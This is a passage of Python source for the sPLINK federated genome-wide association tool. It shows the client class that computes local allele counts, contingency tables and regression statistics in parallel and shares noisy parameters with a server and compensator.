super().__init__(username=username, token=token, project_id=project_id, server_url=server_url, compensator_url=compensator_url,
algorithm=algorithm, name=name, description=description, coordinator=coordinator,
result_dir=result_dir, log_dir=log_dir, tool='sPLINK')
# Splink project (hyper-)parameters
self.chunk_size = chunk_size * 1000
self.max_iterations = max_iterations
# dataset (fam/bim/bed), phenotype, and covariate file paths
self.dataset_file_path = dataset_file_path
self.phenotype_file_path = phenotype_file_path
self.phenotype_name = phenotype_name
self.covariate_file_path = covariate_file_path
self.covariate_names = tuple(
[cov_name.strip() for cov_name in covariate_names.split(',')]) if covariate_names else ()
self.cpu_cores = cpu_cores
# ### attributes to compute local parameters; re-initialized in init_step function
# fam file related attributes
self.sex_values = np.array([])
self.phenotype_values = np.array([])
self.sample_count = 0
# bim file related attributes
self.snp_id_values = np.array([]) # chromosome_number, snp_name, and base_pair_position combined
self.first_allele_names = dict() # indexed by the SNP ID
self.second_allele_names = dict() # indexed by the SNP ID
# bed file related attributes
self.snp_values = dict() # indexed by the SNP ID; in sample_count_step, it is converted to a list
# covariate file related attribute
self.covariate_values = dict()
# attributes to speed-up the creation of the feature matrix
self.non_missing_index_values = np.array([])
self.covariate_matrix = np.array([])
# chunk attributes;
self.current_chunk = -1 # re-initialized in the non_missing_count_step function
self.total_chunks = -1 # re-initialized in the non_missing_count_step function
self.sub_chunk_start_indices = list() # re-initialized in the set_sub_chunk_indices function
self.sub_chunk_end_indices = list() # re-initialized in the set_sub_chunk_indices function
self.snp_indices = set() # re-initialized in each step of the project
self.current_chunk_size = 0 # it is always len(self.snp_indices)
# ### The following dictionaries are indexed by the SNP index
# attributes for non-missing-count step
self.non_missing_sample_counts = dict() # number of samples, where none of the covariate, sex, and SNP values is missing
self.allele_counts = dict() # number of first/second alleles of each SNP
# contingency table for chi-square test
self.contingency_tables = dict()
# linear regression related dictionaries
self.xt_x_matrix = dict()
self.xt_y_vector = dict()
self.sse_values = dict() # sum square error values
        # logistic regression related attributes
self.current_beta_iteration = -1
self.gradient_vectors = dict()
self.hessian_matrices = dict()
self.log_likelihood_values = dict()
# ########## log functions
def log_project_info(self):
""" OVERRIDDEN: log sPLINK project general info """
super().log_project_info()
# sPLINK-specific parameters
dataset_file = self.dataset_file_path.split("/")[-1][:-4]
self.log(f"Dataset file: {dataset_file}", include_date=False)
if self.phenotype_file_path:
phenotype_file = self.phenotype_file_path.split("/")[-1]
self.log(f'Phenotype file: {phenotype_file}', include_date=False)
else:
self.log(f'Phenotype file: -', include_date=False)
if self.covariate_file_path:
covariates_file = self.covariate_file_path.split("/")[-1]
self.log(f'Covariates file: {covariates_file}', include_date=False)
covariate_names = ','.join(self.covariate_names)
self.log(f'Covariate names: {covariate_names}', include_date=False)
else:
self.log(f'Covariates file: -', include_date=False)
self.log(f'CPU cores: {self.cpu_cores}', include_date=False)
self.log("\n", include_date=False)
# ########## Splink step functions
def init_step(self):
""" Initialize the GWAS dataset """
try:
# ##### open GWAS dataset
gwas_dataset = GwasDataset(bed_file_path=self.dataset_file_path,
phenotype_file_path=self.phenotype_file_path,
covariate_file_path=self.covariate_file_path,
phenotype_name=self.phenotype_name,
covariate_names=self.covariate_names)
self.log("Opening and pre-processing the GWAS dataset ...")
gwas_dataset.open_and_preprocess()
if gwas_dataset.is_operation_failed():
self.log(gwas_dataset.get_error_message())
self.set_operation_status_failed()
return
# phenotypes should be binary for logistic regression and chi-square
if not gwas_dataset.is_phenotype_binary() and (self.algorithm == SplinkAlgorithm.LOGISTIC_REGRESSION or
self.algorithm == SplinkAlgorithm.CHI_SQUARE):
self.log(f"Phenotype values must be binary for {self.algorithm} tests!")
self.set_operation_status_failed()
return
# phenotype values should be quantitative for linear regression
if gwas_dataset.is_phenotype_binary() and self.algorithm == SplinkAlgorithm.LINEAR_REGRESSION:
self.log(f"Phenotype values must be quantitative for {self.algorithm} tests!")
self.set_operation_status_failed()
return
# log general info about the gwas dataset
self.log(gwas_dataset.get_dataset_info(), include_date=False)
# #### initialize attributes required to compute local parameters
# initialize fam file related attributes
self.sex_values = gwas_dataset.get_sex_values()
self.phenotype_values = gwas_dataset.get_phenotype_values()
self.sample_count = gwas_dataset.get_sample_count()
# initialize bim file related attributes
self.snp_id_values = gwas_dataset.get_snp_id_values()
self.first_allele_names = gwas_dataset.get_first_allele_names()
self.second_allele_names = gwas_dataset.get_second_allele_names()
# initialize bed file related attribute
self.snp_values = gwas_dataset.get_snp_values()
# initialize covariate file related attributes
self.covariate_values = gwas_dataset.get_covariate_values()
# initialize attributes to speed-up the creation of the feature matrix
self.non_missing_index_values = gwas_dataset.get_non_missing_index_values()
self.covariate_matrix = gwas_dataset.get_covariate_matrix()
except Exception as io_exception:
self.log(io_exception)
self.set_operation_status_failed()
def snp_id_step(self):
""" share SNP IDs with the server """
try:
# share the SNP IDs whose minor allele frequency is non-zero with the server
non_zero_snp_ids = np.array([snp_id for snp_id in self.snp_id_values if self.first_allele_names[snp_id] != '0'])
self.local_parameters[SplinkLocalParameter.SNP_ID] = non_zero_snp_ids
except Exception as snp_exception:
self.log(snp_exception)
self.set_operation_status_failed()
def allele_name_step(self):
""" Initialize SNP (ID) values and first/second allele names based on global (common) SNP IDs first,
and then, share allele names with the server """
try:
            # update snp_id_values, snp_values, first/second allele names
            # based on the global SNP IDs by excluding those that do not exist in the other clients
            # The above-mentioned attributes are converted to lists
# update SNP IDs
self.snp_id_values = self.global_parameters[SplinkGlobalParameter.SNP_ID]
self.log(f"{len(self.snp_id_values)} SNPs are common among all clients")
# update SNP values
snp_values = list()
for snp_id in self.snp_id_values:
snp_values.append(self.snp_values[snp_id])
self.snp_values = snp_values
# update first/second allele names and initialize allele names (shared with server)
first_allele_names = list()
second_allele_names = list()
allele_names = [[], []]
for snp_id in self.snp_id_values:
first_allele_names.append(self.first_allele_names[snp_id])
second_allele_names.append(self.second_allele_names[snp_id])
# sort allele names to prevent revealing which allele is minor or major to the server
if self.first_allele_names[snp_id] < self.second_allele_names[snp_id]:
allele_names[0].append(self.first_allele_names[snp_id])
allele_names[1].append(self.second_allele_names[snp_id])
else:
allele_names[0].append(self.second_allele_names[snp_id])
allele_names[1].append(self.first_allele_names[snp_id])
self.first_allele_names = first_allele_names
self.second_allele_names = second_allele_names
# share allele names with the server
self.local_parameters[SplinkLocalParameter.ALLELE_NAME] = allele_names
except Exception as allele_name_exception:
self.log(allele_name_exception)
self.set_operation_status_failed()
def sample_count_step(self):
""" share noisy local sample count with the server and noise with compensator """
try:
self.local_parameters[SplinkLocalParameter.SAMPLE_COUNT] = self.sample_count
self.set_compensator_flag({SplinkLocalParameter.SAMPLE_COUNT: DataType.NON_NEGATIVE_INTEGER})
except Exception as sample_count_exception:
self.log(sample_count_exception)
self.set_operation_status_failed()
# ##### non_missing_count step related function
def non_missing_count_step(self):
""" init chunk attributes and compute local non-missing sample/allele count for the chunk """
try:
# init chunk attributes
self.current_chunk = self.global_parameters[SplinkGlobalParameter.CURRENT_CHUNK]
self.total_chunks = self.global_parameters[SplinkGlobalParameter.TOTAL_CHUNKS]
self.snp_indices = self.global_parameters[SplinkGlobalParameter.SNP_INDEX] # SNP indices in the current chunk
self.current_chunk_size = len(self.snp_indices)
chunk_start_index = self.global_parameters[SplinkGlobalParameter.CHUNK_START_INDEX]
chunk_end_index = self.global_parameters[SplinkGlobalParameter.CHUNK_END_INDEX]
self.set_sub_chunk_indices(chunk_start_index, chunk_end_index)
# init count dictionaries
self.non_missing_sample_counts = dict()
self.allele_counts = dict()
# queues
queue_non_missing = multiprocessing.Queue()
queue_allele_counts = multiprocessing.Queue()
# threads to read from the queues
thread_read_non_missing_queue = threading.Thread(target=self.read_queue_non_missing, args=(queue_non_missing,))
thread_read_non_missing_queue.daemon = True
thread_read_non_missing_queue.start()
thread_read_allele_counts_queue = threading.Thread(target=self.read_queue_allele_counts, args=(queue_allele_counts,))
thread_read_allele_counts_queue.daemon = True
thread_read_allele_counts_queue.start()
# start processes to compute the local non-missing sample counts as well as first/second allele counts for sub-chunks
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(self.sub_chunk_start_indices, self.sub_chunk_end_indices):
process = multiprocessing.Process(target=self.compute_non_missing_counts,
args=(start_index_sub_chunk, end_index_sub_chunk,
queue_non_missing, queue_allele_counts,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read threads to be done
thread_read_non_missing_queue.join()
thread_read_allele_counts_queue.join()
# close queues
queue_non_missing.close()
queue_allele_counts.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# convert dictionaries to lists;
            # IMPORTANT: sorted(self.snp_indices) should always be used to keep the list ordering consistent with the set of SNP indices
non_missing_sample_counts = list()
allele_counts = list()
for snp_index in sorted(self.snp_indices):
non_missing_sample_counts.append(self.non_missing_sample_counts[snp_index])
allele_counts.append(self.allele_counts[snp_index])
# python list of scalars must be converted to a numpy array if compensator flag is set
non_missing_sample_counts = np.array(non_missing_sample_counts)
# share the noisy counts with the server and noise with compensator
self.local_parameters[SplinkLocalParameter.NON_MISSING_SAMPLE_COUNT] = non_missing_sample_counts
self.local_parameters[SplinkLocalParameter.ALLELE_COUNT] = allele_counts
self.set_compensator_flag({SplinkLocalParameter.NON_MISSING_SAMPLE_COUNT: DataType.NUMPY_ARRAY_NON_NEGATIVE_INTEGER,
SplinkLocalParameter.ALLELE_COUNT: DataType.LIST_NUMPY_ARRAY_NON_NEGATIVE_INTEGER})
except Exception as non_missing_count_exception:
self.log(non_missing_count_exception)
self.set_operation_status_failed()
def compute_non_missing_counts(self, start_index, end_index, queue_non_missing, queue_allele_counts):
""" Compute local non-missing sample count as well as first/second allele count for a sub-chunk """
# init dictionaries
non_missing_sample_counts = dict()
allele_counts = dict()
try:
for snp_index in np.arange(start_index, end_index):
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_non_missing.put(non_missing_sample_counts)
queue_allele_counts.put(allele_counts)
non_missing_sample_counts = dict()
allele_counts = dict()
# non-missing sample count
x_matrix, y_vector = self.get_x_matrix_y_vector(snp_index)
non_missing_sample_counts[snp_index] = y_vector.size
# allele count
snp_values = self.snp_values[snp_index]
first_allele_count = int(
2 * np.where(np.array(snp_values) == SnpValue.HOMOZYGOTE_00)[0].size +
np.where(np.array(snp_values) == SnpValue.HETEROZYGOTE)[0].size
)
second_allele_count = int(
2 * np.where(np.array(snp_values) == SnpValue.HOMOZYGOTE_11)[0].size +
np.where(np.array(snp_values) == SnpValue.HETEROZYGOTE)[0].size
)
                # to preserve the correct allele_name -> allele_count mapping, which is based on the sorted allele names on the server
if self.first_allele_names[snp_index] < self.second_allele_names[snp_index]:
allele_counts[snp_index] = np.array([first_allele_count, second_allele_count])
else:
allele_counts[snp_index] = np.array([second_allele_count, first_allele_count])
# put remaining results in the corresponding queues
queue_non_missing.put(non_missing_sample_counts)
queue_allele_counts.put(allele_counts)
except Exception as count_exception:
self.log(count_exception)
self.set_operation_status_failed()
# ##### minor_allele step related functions
def minor_allele_step(self):
""" Update the SNP values based on the global minor/major allele name """
try:
# get global minor allele names
global_minor_allele_names = self.global_parameters[SplinkGlobalParameter.MINOR_ALLELE_NAME]
global_major_allele_names = self.global_parameters[SplinkGlobalParameter.MAJOR_ALLELE_NAME]
for snp_index in global_minor_allele_names.keys():
# if local minor/major allele is different from the global minor/major allele
if self.second_allele_names[snp_index] != global_major_allele_names[snp_index]:
# swap the local minor and major allele names
self.first_allele_names[snp_index] = global_minor_allele_names[snp_index]
self.second_allele_names[snp_index] = global_major_allele_names[snp_index]
                    # invert the mapping of the SNP values 0 -> 2 and 2 -> 0
self.snp_values[snp_index] = np.where(self.snp_values[snp_index] == 2, -3,
self.snp_values[snp_index])
self.snp_values[snp_index] = np.where(self.snp_values[snp_index] == 0, 2,
self.snp_values[snp_index])
self.snp_values[snp_index] = np.where(self.snp_values[snp_index] == -3, 0,
self.snp_values[snp_index])
except Exception as minor_allele_exception:
self.log(minor_allele_exception)
self.set_operation_status_failed()
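    # Illustrative example (added for exposition): the sentinel value -3 keeps
    # the two swaps above from colliding. Local SNP values [0, 1, 2, 2] become
    # [0, 1, -3, -3] after the first pass, [2, 1, -3, -3] after the second, and
    # [2, 1, 0, 0] after the third, i.e. the homozygote codes are flipped while
    # heterozygotes stay 1.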
# ##### contingency table step related functions
def contingency_table_step(self):
""" Compute local contingency table for the chunk"""
try:
# get SNP indices for which contingency table should be computed
self.snp_indices = self.global_parameters[SplinkGlobalParameter.SNP_INDEX]
self.current_chunk_size = len(self.snp_indices)
# init contingency tables
self.contingency_tables = dict()
# queue
queue_contingency_tables = multiprocessing.Queue()
# thread to read from the queues
thread_read_contingency_tables_queue = threading.Thread(target=self.read_queue_contingency_tables,
args=(queue_contingency_tables,))
thread_read_contingency_tables_queue.daemon = True
thread_read_contingency_tables_queue.start()
# processes to compute the local contingency tables for the sub-chunks
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(self.sub_chunk_start_indices, self.sub_chunk_end_indices):
process = multiprocessing.Process(target=self.compute_contingency_table,
args=(start_index_sub_chunk, end_index_sub_chunk,
queue_contingency_tables,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
thread_read_contingency_tables_queue.join()
# close queue
queue_contingency_tables.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# convert dictionaries to lists;
contingency_tables = list()
for snp_index in sorted(self.snp_indices):
contingency_tables.append(self.contingency_tables[snp_index])
# share the noisy contingency tables with the server and noise with compensator
self.local_parameters[SplinkLocalParameter.CONTINGENCY_TABLE] = contingency_tables
self.set_compensator_flag({SplinkLocalParameter.CONTINGENCY_TABLE: DataType.LIST_NUMPY_ARRAY_NON_NEGATIVE_INTEGER})
except Exception as contingency_table_exception:
self.log(contingency_table_exception)
self.set_operation_status_failed()
# compute contingency table for a set of SNPs
def compute_contingency_table(self, start_snp_index, end_snp_index, contingency_table_queue):
""" Compute local contingency table for a sub-chunk """
contingency_tables = dict()
for snp_index in np.arange(start_snp_index, end_snp_index):
if snp_index not in self.snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
contingency_table_queue.put(contingency_tables)
contingency_tables = dict()
minor_allele = self.first_allele_names[snp_index]
major_allele = self.second_allele_names[snp_index]
# minor-case
minor_case_count = self.compute_allele_count(snp_index, minor_allele, PhenotypeValue.CASE)
# major-case
major_case_count = self.compute_allele_count(snp_index, major_allele, PhenotypeValue.CASE)
# minor-control
minor_control_count = self.compute_allele_count(snp_index, minor_allele, PhenotypeValue.CONTROL)
# major-control
major_control_count = self.compute_allele_count(snp_index, major_allele, PhenotypeValue.CONTROL)
# contingency table value: [minor-case, major-case, minor-control, major-control]
contingency_tables[snp_index] = np.array([minor_case_count,
major_case_count,
minor_control_count,
major_control_count])
# put the remaining contingency tables into queue
contingency_table_queue.put(contingency_tables)
# ##### functions related to the beta step of the linear regression
def beta_linear_step(self):
""" Compute X'X and X'Y matrices for the chunk """
try:
# set dictionaries to empty at the beginning of the chunk
self.xt_x_matrix = dict()
self.xt_y_vector = dict()
# queues
queue_xt_x_matrix = multiprocessing.Queue()
queue_xt_y_vector = multiprocessing.Queue()
# get SNP indices for which X'X and X'Y should be computed
self.snp_indices = self.global_parameters[SplinkGlobalParameter.SNP_INDEX]
self.current_chunk_size = len(self.snp_indices)
# threads to read from the queues
xt_x_matrix_read_thread = threading.Thread(target=self.read_queue_xt_x_matrix,
args=(queue_xt_x_matrix,))
xt_x_matrix_read_thread.daemon = True
xt_x_matrix_read_thread.start()
xt_y_vector_read_thread = threading.Thread(target=self.read_queue_xt_y_vector,
args=(queue_xt_y_vector, ))
xt_y_vector_read_thread.daemon = True
xt_y_vector_read_thread.start()
# processes to compute local X'X and X'Y for the sub-chunks
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(self.sub_chunk_start_indices, self.sub_chunk_end_indices):
process = multiprocessing.Process(target=self.compute_beta_linear_parameters,
args=(start_index_sub_chunk, end_index_sub_chunk,
queue_xt_x_matrix, queue_xt_y_vector))
process_list.append(process)
process.daemon = True
process.start()
# wait for read threads to be done
xt_x_matrix_read_thread.join()
xt_y_vector_read_thread.join()
# close queues
queue_xt_x_matrix.close()
queue_xt_y_vector.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# convert dictionaries to lists;
xt_x_matrix = list()
xt_y_vector = list()
for snp_index in sorted(self.snp_indices):
xt_x_matrix.append(self.xt_x_matrix[snp_index])
xt_y_vector.append(self.xt_y_vector[snp_index])
# share noisy local X'X matrix and X'Y vector with the server and noise with compensator
self.local_parameters[SplinkLocalParameter.XT_X_MATRIX] = xt_x_matrix
self.local_parameters[SplinkLocalParameter.XT_Y_VECTOR] = xt_y_vector
self.set_compensator_flag({SplinkLocalParameter.XT_X_MATRIX: DataType.LIST_NUMPY_ARRAY_FLOAT,
SplinkLocalParameter.XT_Y_VECTOR: DataType.LIST_NUMPY_ARRAY_FLOAT})
except Exception as beta_linear_exception:
self.log(beta_linear_exception)
self.set_operation_status_failed()
def compute_beta_linear_parameters(self, start_index, end_index, queue_xt_x_matrix, queue_xt_y_vector):
""" Compute local X'X and X'Y for a sub-chunk """
xt_x_matrices = dict()
xt_y_vectors = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in self.snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_xt_x_matrix.put(xt_x_matrices)
queue_xt_y_vector.put(xt_y_vectors)
xt_x_matrices = dict()
xt_y_vectors = dict()
x_matrix, y_vector = self.get_x_matrix_y_vector(snp_index)
xt_x_matrices[snp_index] = np.dot(x_matrix.T, x_matrix)
xt_y_vectors[snp_index] = np.dot(x_matrix.T, y_vector)
queue_xt_x_matrix.put(xt_x_matrices)
queue_xt_y_vector.put(xt_y_vectors)
# ##### functions related to the std error step of the linear regression algorithm
def std_error_linear_step(self):
""" Compute local sum square error values for the chunk """
try:
# set sse_values dictionary to empty at the beginning of the chunk
self.sse_values = dict()
# queue
queue_sse = multiprocessing.Queue()
# thread to read from the queues
sse_read_thread = threading.Thread(target=self.read_queue_sse, args=(queue_sse,))
sse_read_thread.daemon = True
sse_read_thread.start()
# global beta values
beta_values = self.global_parameters[SplinkGlobalParameter.BETA]
self.current_chunk_size = len(beta_values)
# processes to compute the local SSE values for the sub-chunks
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(self.sub_chunk_start_indices, self.sub_chunk_end_indices):
process = multiprocessing.Process(target=self.compute_sse_values,
args=(start_index_sub_chunk, end_index_sub_chunk,
beta_values, queue_sse))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
sse_read_thread.join()
# close queue
queue_sse.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# convert dictionary to list
sse_values = list()
for snp_index in sorted(beta_values.keys()):
sse_values.append(self.sse_values[snp_index])
# python list of scalar values must be converted to a numpy array if compensator flag is set
sse_values = np.array(sse_values)
# share noisy local sse values with the server and noise with compensator
self.local_parameters[SplinkLocalParameter.SSE] = sse_values
self.set_compensator_flag({SplinkLocalParameter.SSE: DataType.NUMPY_ARRAY_FLOAT})
except Exception as std_error_linear_exception:
self.log(std_error_linear_exception)
self.set_operation_status_failed()
def compute_sse_values(self, start_index, end_index, beta_values, queue_sse):
""" Compute local sum square error value for a sub-chunk """
sse_values = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in beta_values.keys():
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_sse.put(sse_values)
sse_values = dict()
# compute sum square error value for the SNP
x_matrix, y_vector = self.get_x_matrix_y_vector(snp_index)
beta_vector = beta_values[snp_index].reshape(-1, 1)
y_predicted = np.dot(x_matrix, beta_vector)
sse_values[snp_index] = np.sum(np.square(y_vector - y_predicted))
queue_sse.put(sse_values)
# ##### logistic regression beta step related functions
def beta_logistic_step(self):
""" Compute local gradient and Hessian matrices as well as log likelihood values for the chunk """
try:
# set gradient, Hessian, and log likelihood dictionaries to empty at the beginning of the chunk
self.gradient_vectors = dict()
self.hessian_matrices = dict()
self.log_likelihood_values = dict()
# queues
queue_gradient = multiprocessing.Queue()
queue_hessian = multiprocessing.Queue()
queue_log_likelihood = multiprocessing.Queue()
# thread to read from the queues
gradient_read_thread = threading.Thread(target=self.read_queue_gradient, args=(queue_gradient,))
gradient_read_thread.daemon = True
gradient_read_thread.start()
hessian_read_thread = threading.Thread(target=self.read_queue_hessian, args=(queue_hessian,))
hessian_read_thread.daemon = True
hessian_read_thread.start()
log_likelihood_read_thread = threading.Thread(target=self.read_queue_log_likelihood, args=(queue_log_likelihood,))
log_likelihood_read_thread.daemon = True
log_likelihood_read_thread.start()
# global beta values and current beta iteration
beta_values = self.global_parameters[SplinkGlobalParameter.BETA]
self.current_chunk_size = len(beta_values)
self.current_beta_iteration = self.global_parameters[SplinkGlobalParameter.CURRENT_BETA_ITERATION]
# processes to compute the gradient, Hessian, and log likelihood values for sub-chunks
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(self.sub_chunk_start_indices,
self.sub_chunk_end_indices):
process = multiprocessing.Process(target=self.compute_beta_logistic_parameters,
args=(start_index_sub_chunk, end_index_sub_chunk,
beta_values, queue_gradient, queue_hessian, queue_log_likelihood))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
gradient_read_thread.join()
hessian_read_thread.join()
log_likelihood_read_thread.join()
# close queues
queue_gradient.close()
queue_hessian.close()
queue_log_likelihood.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# convert dictionary to list
gradient_vectors = list()
hessian_matrices = list()
log_likelihood_values = list()
for snp_index in sorted(beta_values.keys()):
gradient_vectors.append(self.gradient_vectors[snp_index])
hessian_matrices.append(self.hessian_matrices[snp_index])
log_likelihood_values.append(self.log_likelihood_values[snp_index])
# python list of scalars must be converted to a numpy array if compensator flag is set
log_likelihood_values = np.array(log_likelihood_values)
# share the noisy local gradient, Hessian, and log likelihood values with the server and noise with compensator
self.local_parameters[SplinkLocalParameter.GRADIENT] = gradient_vectors
self.local_parameters[SplinkLocalParameter.HESSIAN] = hessian_matrices
self.local_parameters[SplinkLocalParameter.LOG_LIKELIHOOD] = log_likelihood_values
self.set_compensator_flag({SplinkLocalParameter.GRADIENT: DataType.LIST_NUMPY_ARRAY_FLOAT,
SplinkLocalParameter.HESSIAN: DataType.LIST_NUMPY_ARRAY_FLOAT,
SplinkLocalParameter.LOG_LIKELIHOOD: DataType.NUMPY_ARRAY_FLOAT})
except Exception as beta_logistic_exception:
self.log(beta_logistic_exception)
self.set_operation_status_failed()
def compute_beta_logistic_parameters(self, start_index, end_index, beta_values, queue_gradient, queue_hessian, queue_log_likelihood):
""" Compute local gradient vector, Hessian matrix, and log likelihood values for a sub-chunk """
epsilon = np.finfo(float).eps # to avoid log(0)
gradient_vectors = dict()
hessian_matrices = dict()
log_likelihood_values = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in beta_values.keys():
continue
# put results in the queues whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_gradient.put(gradient_vectors)
queue_hessian.put(hessian_matrices)
queue_log_likelihood.put(log_likelihood_values)
gradient_vectors = dict()
hessian_matrices = dict()
log_likelihood_values = dict()
x_matrix, y_vector = self.get_x_matrix_y_vector(snp_index)
beta_vector = beta_values[snp_index].reshape(-1, 1)
# gradient
x_beta_product = np.dot(x_matrix, beta_vector)
y_predicted = 1 / (1 + np.exp(-x_beta_product))
gradient_vectors[snp_index] = np.dot(x_matrix.T, (y_vector - y_predicted))
# hessian matrix
hessian_matrices[snp_index] = np.dot(np.multiply(x_matrix.T, (y_predicted * (1 - y_predicted)).T), x_matrix)
# log likelihood
log_likelihood_values[snp_index] = np.sum(
y_vector * np.log(y_predicted + epsilon) + (1 - y_vector) * np.log(1 - y_predicted + epsilon))
queue_gradient.put(gradient_vectors)
queue_hessian.put(hessian_matrices)
queue_log_likelihood.put(log_likelihood_values)
# ##### std error step related functions for logistic regression algorithm
def std_error_logistic_step(self):
""" Compute local hessian matrices for the chunk """
try:
# set Hessian dictionary to empty at the beginning of the chunk
self.hessian_matrices = dict()
# queue
queue_hessian = multiprocessing.Queue()
# thread to read from the queue
hessian_read_thread = threading.Thread(target=self.read_queue_hessian, args=(queue_hessian,))
hessian_read_thread.daemon = True
hessian_read_thread.start()
# global beta values
beta_values = self.global_parameters[SplinkGlobalParameter.BETA]
self.current_chunk_size = len(beta_values)
# processes to compute the local Hessian matrices for the sub-chunks
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(self.sub_chunk_start_indices,
self.sub_chunk_end_indices):
process = multiprocessing.Process(target=self.compute_hessian_matrices,
args=(start_index_sub_chunk, end_index_sub_chunk, beta_values, queue_hessian,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
hessian_read_thread.join()
# close queues
queue_hessian.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# convert dictionary to list
hessian_matrices = list()
for snp_index in sorted(beta_values.keys()):
hessian_matrices.append(self.hessian_matrices[snp_index])
# share noisy local Hessian matrices with the server and noise with compensator
self.local_parameters[SplinkLocalParameter.HESSIAN] = hessian_matrices
self.set_compensator_flag({SplinkLocalParameter.HESSIAN: DataType.LIST_NUMPY_ARRAY_FLOAT})
except Exception as std_error_logistic_exception:
self.log(std_error_logistic_exception)
self.set_operation_status_failed()
def compute_hessian_matrices(self, start_index, end_index, beta_values, queue_hessian):
""" Compute local Hessian matrices for a sub-chunk """
hessian_matrices = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in beta_values.keys():
continue
# put results in the queues whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_hessian.put(hessian_matrices)
hessian_matrices = dict()
# Hessian matrix
x_matrix, y_vector = self.get_x_matrix_y_vector(snp_index)
beta_vector = beta_values[snp_index].reshape(-1, 1)
x_beta_product = np.dot(x_matrix, beta_vector)
y_predicted = 1 / (1 + np.exp(-x_beta_product))
hessian_matrices[snp_index] = np.dot(np.multiply(x_matrix.T, (y_predicted * (1 - y_predicted)).T), x_matrix)
queue_hessian.put(hessian_matrices)
# ##### Queue functions
def read_queue_non_missing(self, queue_non_missing):
while len(self.non_missing_sample_counts) < self.current_chunk_size:
sample_count_non_missing = queue_non_missing.get()
self.non_missing_sample_counts.update(sample_count_non_missing)
def read_queue_allele_counts(self, queue_allele_counts):
while len(self.allele_counts) < self.current_chunk_size:
count_alleles = queue_allele_counts.get()
self.allele_counts.update(count_alleles)
def read_queue_contingency_tables(self, queue_contingency_tables):
while len(self.contingency_tables) < self.current_chunk_size:
cont_table = queue_contingency_tables.get()
self.contingency_tables.update(cont_table)
def read_queue_xt_x_matrix(self, queue_xt_x_matrix):
while len(self.xt_x_matrix) < self.current_chunk_size:
xt_x = queue_xt_x_matrix.get()
self.xt_x_matrix.update(xt_x)
def read_queue_xt_y_vector(self, queue_xt_y_vector):
while len(self.xt_y_vector) < self.current_chunk_size:
xt_y = queue_xt_y_vector.get()
self.xt_y_vector.update(xt_y)
def read_queue_sse(self, queue_sse):
while len(self.sse_values) < self.current_chunk_size:
sse = queue_sse.get()
self.sse_values.update(sse)
def read_queue_gradient(self, queue_gradient):
while len(self.gradient_vectors) < self.current_chunk_size:
gradient = queue_gradient.get()
self.gradient_vectors.update(gradient)
def read_queue_hessian(self, queue_hessian):
while len(self.hessian_matrices) < self.current_chunk_size:
hessian_matrix = queue_hessian.get()
self.hessian_matrices.update(hessian_matrix)
def read_queue_log_likelihood(self, queue_log_likelihood):
while len(self.log_likelihood_values) < self.current_chunk_size:
log_likelihood = queue_log_likelihood.get()
self.log_likelihood_values.update(log_likelihood)
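# A minimal standalone sketch of the producer/consumer pattern behind the
# read_queue_* methods above: worker processes put partial {index: value}
# dictionaries on a multiprocessing.Queue and a daemon thread drains it into
# one result dict until the expected number of entries has arrived. The names
# and toy workload here are illustrative, not the sPLINK attributes.
import multiprocessing
import threading

def _producer(queue, start, end):
    # each worker contributes a partial dictionary of results
    queue.put({i: i * i for i in range(start, end)})

def _drain(queue, results, expected_size):
    while len(results) < expected_size:
        results.update(queue.get())

if __name__ == '__main__':
    q = multiprocessing.Queue()
    results = {}
    reader = threading.Thread(target=_drain, args=(q, results, 10))
    reader.daemon = True
    reader.start()
    workers = [multiprocessing.Process(target=_producer, args=(q, s, s + 5)) for s in (0, 5)]
    for w in workers:
        w.start()
    reader.join()  # returns once all 10 entries have been collected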
# ##### Multi-processing functions
def set_sub_chunk_indices(self, start_snp_index, end_snp_index):
""" Determine start/end indices for sub-chunks assigned to each process/core """
try:
if end_snp_index <= start_snp_index:
self.log("end_snp_index must be greater than start_snp_index!")
self.set_operation_status_failed()
return
# ensure each process/core computes statistics for at least one SNP
if self.current_chunk_size < self.cpu_cores:
cpu_cores = 1
else:
cpu_cores = self.cpu_cores
sub_chunk_size = int(np.ceil(self.current_chunk_size / cpu_cores))
start_indices = np.arange(start_snp_index, end_snp_index, sub_chunk_size)
end_indices = start_indices + sub_chunk_size
end_indices[-1] = end_snp_index
self.sub_chunk_start_indices = start_indices
self.sub_chunk_end_indices = end_indices
except Exception as sub_chunk_exception:
self.log(sub_chunk_exception)
self.set_operation_status_failed()
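# A minimal standalone sketch of the index arithmetic in set_sub_chunk_indices
# above: the chunk is split into ceil(chunk_size / cores) sized sub-chunks and
# the last end index is clamped to the chunk boundary. Values are illustrative.
import numpy as np

start_snp, end_snp, cores = 100, 123, 4
chunk_size = end_snp - start_snp                        # 23 SNPs
sub_chunk_size = int(np.ceil(chunk_size / cores))       # 6
starts = np.arange(start_snp, end_snp, sub_chunk_size)  # [100 106 112 118]
ends = starts + sub_chunk_size                          # [106 112 118 124]
ends[-1] = end_snp                                      # clamp: [106 112 118 123]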
